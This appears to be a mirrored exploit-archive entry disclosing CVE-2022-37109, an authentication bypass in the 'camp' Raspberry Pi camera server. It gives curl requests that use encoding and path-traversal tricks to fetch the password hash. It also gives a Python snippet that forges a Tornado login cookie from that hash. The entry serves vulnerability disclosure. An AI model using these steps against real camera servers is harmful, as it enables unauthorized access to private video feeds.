_camp_ Raspberry Pi camera server 1.0 Exploit, Authentication Bypass

# Exploit Title: "camp" Raspberry Pi camera server 1.0 -  Authentication Bypass
# Date: 2022-07-25
# Exploit Author: Elias Hohl
# Vendor Homepage: https://github.com/patrickfuller
# Software Link: https://github.com/patrickfuller/camp
# Version: < bf6af5c2e5cf713e4050c11c52dd4c55e89880b1
# Tested on: Ubuntu 20.04
# CVE : CVE-2022-37109

"camp" Raspberry Pi camera server Authentication Bypass vulnerability


1. Start an instance of the "camp" server:
python3 server.py --require-login

2. Fetch the SHA-512 password hash using one of these methods:

curl http://localhost:8000/static/password.tx%74


curl http://localhost:8000/static/./password.txt --path-as-is


curl http://localhost:8000/static/../camp/password.txt --path-as-is

3. Execute the following python snippet (replace the hash with the hash you received in step 2).

from tornado.web import create_signed_value
import time
print(create_signed_value("5895bb1bccf1da795c83734405a7a0193fbb56473842118dd1b66b2186a290e00fa048bc2a302d763c381ea3ac3f2bc2f30aaa005fb2c836bbf641d395c4eb5e", "camp", str(time.time())))

4. In the browser, navigate to http://localhost:8000/, add a cookie named "camp" and set the value to the result of the script from step 3, then reload the page. You will be logged in.

All rights reserved nPulse.net 2009 - 2024
Powered by: MVCP2 / BVCP / ASPF-MILTER / PHP 8.3 / NGINX / FreeBSD